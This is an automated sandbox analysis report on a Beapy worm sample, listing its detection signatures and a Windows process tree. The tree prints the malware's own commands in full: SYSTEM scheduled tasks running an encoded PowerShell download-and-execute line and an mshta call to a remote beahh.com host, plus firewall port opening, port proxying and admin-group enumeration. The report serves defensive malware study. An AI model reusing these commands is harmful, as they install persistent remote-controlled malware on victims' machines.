Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
05-04-2021 09:33
General
-
Target
bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe
-
Size
6.6MB
-
MD5
433f2dd33ad43581ccd248d2fc65d9ab
-
SHA1
e59089829cdc087eda6a879bcdf613ae57602c6a
-
SHA256
bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da
-
SHA512
e2d64fb81951ca011ea0d299756ba87d201725a4895465c63ff1eca320de2b7dbf52877c19e8189f7efdab34072ae1f30e3dd9174e6e2c9b98b7625cb04c4b56
Score
10/10
Malware Config
Signatures
-
Beapy
Beapy is a python worm with crypto mining capabilities.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 20 IoCs
-
Drops file in Windows directory 6 IoCs
-
Detects Pyinstaller 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\CHpTyAEI.exeC:\Windows\CHpTyAEI.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo ltYPATjJ >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\GepHV.exe&move /y c:\windows\temp\dig.exe c:\windows\wDSMMNli.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\wDSMMNli.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\GepHV.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F5⤵
- Creates scheduled task(s)
- Modifies data under HKEY_USERS
-
-
-
-
-
C:\Windows\dZNmZGfM.exeC:\Windows\dZNmZGfM.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo ltYPATjJ >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\GepHV.exe&move /y c:\windows\temp\dig.exe c:\windows\wDSMMNli.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\wDSMMNli.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\GepHV.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F5⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\pXCajoMq.exeC:\Windows\pXCajoMq.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo cVyqSl >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\LlbGeDIx.exe&move /y c:\windows\temp\dig.exe c:\windows\kVlvfjN.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ydKJ" /tr "c:\windows\kVlvfjN.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\kVlvfjN.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\LlbGeDIx.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ydKJ" /tr "c:\windows\kVlvfjN.exe" /F5⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\kUItMQzp.exeC:\Windows\kUItMQzp.exe1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo tmxBNAfH >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\LlbGeDIx.exe&move /y c:\windows\temp\dig.exe c:\windows\kVlvfjN.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\kuSeMCo" /tr "c:\windows\kVlvfjN.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\kVlvfjN.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\LlbGeDIx.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\kuSeMCo" /tr "c:\windows\kVlvfjN.exe" /F5⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\gNdnOCsQ.exeC:\Windows\gNdnOCsQ.exe1⤵
-
C:\Windows\flRJWwPp.exeC:\Windows\flRJWwPp.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB